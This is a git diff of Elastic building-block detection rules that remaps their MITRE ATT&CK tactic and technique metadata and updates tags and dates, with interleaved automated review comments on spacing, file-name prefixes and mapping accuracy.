@@ -54,30 +43,54 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml index 6c94369c5a7..51ce78a36d2 100644 --- a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml +++ b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
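Review bot: The new `T1098.003` sub-technique under Persistence is inserted directly after `reference = "https://attack.mitre.org/techniques/T1098/"` with no blank line, while the rest of this hunk adds `+` separator lines between every `[[rule.threat.technique]]`, sub-technique and `[rule.threat.tactic]` table. Add the blank line before `[[rule.threat.technique.subtechnique]]` so the Persistence and Privilege Escalation blocks read identically. The same uneven spacing appears in the WriteDAC rule (`+[[rule.threat]]` directly after the TA0003 reference and no blank before its technique) and in the modprobe rule (`+framework = "MITRE ATT&CK"` followed immediately by `+[[rule.threat.technique]]`).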
@@ -27,16 +27,7 @@ references = ["https://irsl.medium.com/the-trouble-with-microsofts-troubleshoote risk_score = 21 rule_id = "808291d3-e918-4a3a-86cd-73052a0c9bdc" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -59,14 +50,31 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_outlook_suspicious_child.toml b/rules_building_block/defense_evasion_outlook_suspicious_child.toml index a081138d5d5..1c1aa8ae3d2 100644 --- a/rules_building_block/defense_evasion_outlook_suspicious_child.toml +++ b/rules_building_block/defense_evasion_outlook_suspicious_child.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/01/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,15 +20,7 @@ name = "Suspicious Outlook Child Process" risk_score = 21 rule_id = "6cf17149-a8e3-44ec-9ec9-fdc8535547a1" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" 
@@ -72,41 +64,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml index 88639b9b669..05aa2a61ba6 100644 --- a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml +++ b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
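Review bot: The only remaining tactic for this rule is Execution (`TA0002`, via `T1203`), yet the file keeps its `defense_evasion_` prefix. If the repository's file-naming convention keys on the rule's primary tactic, the rename should accompany the remap; otherwise a one-line note in the commit that the prefix is historical would save the next reader the question. The same prefix/tactic mismatch arises in `defense_evasion_service_path_registry.toml`, `defense_evasion_services_exe_path.toml` and `defense_evasion_write_dac_access.toml` (now Persistence/Privilege Escalation) and in `discovery_linux_modprobe_enumeration.toml` (now Persistence/Privilege Escalation). The query and the rest of the rule header are outside this hunk.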
@@ -174,39 +174,21 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/defense_evasion_powershell_clear_logs_script.toml b/rules_building_block/defense_evasion_powershell_clear_logs_script.toml index c008bcb22fd..f38adcbf777 100644 --- a/rules_building_block/defense_evasion_powershell_clear_logs_script.toml +++ b/rules_building_block/defense_evasion_powershell_clear_logs_script.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
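Review bot: This hunk drops the Execution block (`T1059.001` / `TA0002`) but the patch has no `tags` hunk for this file, so a `Tactic: Execution` entry, if the rule carries one, would now have no matching threat entry. Please confirm the tag list for this rule matches the single remaining tactic (`Tactic: Defense Evasion`), or include the tags change in the same commit. The same check applies to `defense_evasion_powershell_clear_logs_script.toml` (Execution block removed) and `defense_evasion_service_disabled_registry.toml` (Impact block removed), neither of which has a tags hunk here. The `tags` line itself is outside this hunk.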
@@ -143,39 +143,21 @@ value = "?:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Se [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/defense_evasion_service_disabled_registry.toml b/rules_building_block/defense_evasion_service_disabled_registry.toml index c1f1d49dab7..cc41fc4c9ba 100644 --- a/rules_building_block/defense_evasion_service_disabled_registry.toml +++ b/rules_building_block/defense_evasion_service_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -48,26 +48,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1489" -name = "Service Stop" -reference = "https://attack.mitre.org/techniques/T1489/" - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml index 9eb28e15955..f2d9b61fb4e 100644 --- a/rules_building_block/defense_evasion_service_path_registry.toml +++ b/rules_building_block/defense_evasion_service_path_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -20,16 +20,7 @@ name = "Service Path Modification" risk_score = 21 rule_id = "f243fe39-83a4-46f3-a3b6-707557a102df" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -51,48 +42,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - 
diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml index 5a13a3271d6..f8c032bc23e 100644 --- a/rules_building_block/defense_evasion_services_exe_path.toml +++ b/rules_building_block/defense_evasion_services_exe_path.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,17 +26,7 @@ name = "Service Path Modification via sc.exe" risk_score = 21 rule_id = "c5677997-f75b-4cda-b830-a75920514096" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Rule Type: BBR", - "Data Source: Sysmon", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" 
@@ -48,48 +38,36 @@ process where event.type == "start" and process.name : "sc.exe" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/defense_evasion_unsigned_bits_client.toml b/rules_building_block/defense_evasion_unsigned_bits_client.toml index 84012c3b2d4..7d83ae84a7f 100644 --- a/rules_building_block/defense_evasion_unsigned_bits_client.toml +++ b/rules_building_block/defense_evasion_unsigned_bits_client.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -44,24 +44,13 @@ not process.code_signature.status : ("errorExpired", "errorCode_endpoint*") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_write_dac_access.toml b/rules_building_block/defense_evasion_write_dac_access.toml index ca738169f21..ad7ea692da9 100644 --- a/rules_building_block/defense_evasion_write_dac_access.toml +++ b/rules_building_block/defense_evasion_write_dac_access.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -42,16 +42,7 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Active Directory", - "Use Case: Active Directory Monitoring", - "Rule Type: BBR", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Rule Type: BBR", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "query" 
@@ -63,19 +54,26 @@ host.os.type: "windows" and event.action : ("Directory Service Access" or "objec [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" -[[rule.threat.technique.subtechnique]] -id = "T1222.001" -name = "Windows File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/001/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules_building_block/discovery_capnetraw_capability.toml b/rules_building_block/discovery_capnetraw_capability.toml index 66cd382d8ff..fc509abd200 100644 --- a/rules_building_block/discovery_capnetraw_capability.toml +++ b/rules_building_block/discovery_capnetraw_capability.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/10" integration = ["endpoint"] maturity = "production" -updated_date = "2024/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
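Review bot: The WriteDAC rule's technique changes from `T1222.001` (Windows File and Directory Permissions Modification) to `T1098` (Account Manipulation) under both Persistence and Privilege Escalation, but the hunk header context shows the query keyed on `Directory Service Access` events, which appear to cover DACL writes on directory objects generally rather than only on accounts. If the query is not restricted to user or group objects, consider keeping `T1222.001` under Defense Evasion alongside the new mapping instead of replacing it; the new `T1098` tables carry no sub-technique either, so a sentence in the commit on why the permission-modification technique was dropped would help. The query and the rest of the rule lie outside this hunk.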
@@ -49,14 +49,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "new_terms" @@ -74,11 +67,23 @@ id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_generic_account_groups.toml b/rules_building_block/discovery_generic_account_groups.toml index eb8dadcd502..ce6ec481af5 100644 --- a/rules_building_block/discovery_generic_account_groups.toml +++ b/rules_building_block/discovery_generic_account_groups.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -64,10 +64,17 @@ and not process.parent.name : "LTSVC.exe" and not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" @@ -78,11 +85,11 @@ id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -93,15 +100,12 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml index 981adb13784..a7bc9dae1fb 100644 --- a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml +++ b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/12" integration = ["auditd_manager"] maturity = "production" -updated_date = "2024/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -66,15 +66,14 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml index 3df1dd8bd91..68e6f743fc7 100644 --- a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml +++ b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,16 +59,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules_building_block/discovery_linux_modprobe_enumeration.toml b/rules_building_block/discovery_linux_modprobe_enumeration.toml index eee45ca1da0..1dec0fd05c4 100644 --- a/rules_building_block/discovery_linux_modprobe_enumeration.toml 
+++ b/rules_building_block/discovery_linux_modprobe_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,13 +44,7 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "low" -tags = [ - "Data Source: Auditd Manager", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", -] +tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "OS: Linux", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -73,15 +67,37 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_linux_sysctl_enumeration.toml b/rules_building_block/discovery_linux_sysctl_enumeration.toml index 332fd65a447..81a0034b824 100644 --- a/rules_building_block/discovery_linux_sysctl_enumeration.toml +++ b/rules_building_block/discovery_linux_sysctl_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
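Review bot: This hunk remaps the modprobe rule from Discovery (`T1082`) to `T1547.006` (Kernel Modules and Extensions) under Persistence and Privilege Escalation, while the file name and its `new_terms` framing still describe enumeration. `T1547.006` covers loading a module for autostart; if the query matches listing or probing modules rather than inserting them, the Discovery block should stay (possibly alongside the new ones), and the Persistence/Privilege Escalation tags in the `@@ -44,13 +44,7 @@` hunk follow from that decision. The sysctl rule raises the analogous question: its hunk header context keys on `/etc/sysctl.conf` and `/etc/sysctl.d` file paths, and `T1562` (Impair Defenses) without a sub-technique implies modification rather than a read. The query for both rules is outside these hunks.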
@@ -44,13 +44,7 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "low" -tags = [ - "Data Source: Auditd Manager", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", -] +tags = ["Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Auditd Manager", "OS: Linux", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "new_terms" @@ -70,15 +64,27 @@ file.path : ("/etc/sysctl.conf" or "/etc/sysctl.d" or /etc/sysctl.d/*) and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_linux_system_owner_user_discovery.toml b/rules_building_block/discovery_linux_system_owner_user_discovery.toml index fe5f446429f..f5ed9b7ff4e 100644 --- a/rules_building_block/discovery_linux_system_owner_user_discovery.toml +++ b/rules_building_block/discovery_linux_system_owner_user_discovery.toml 
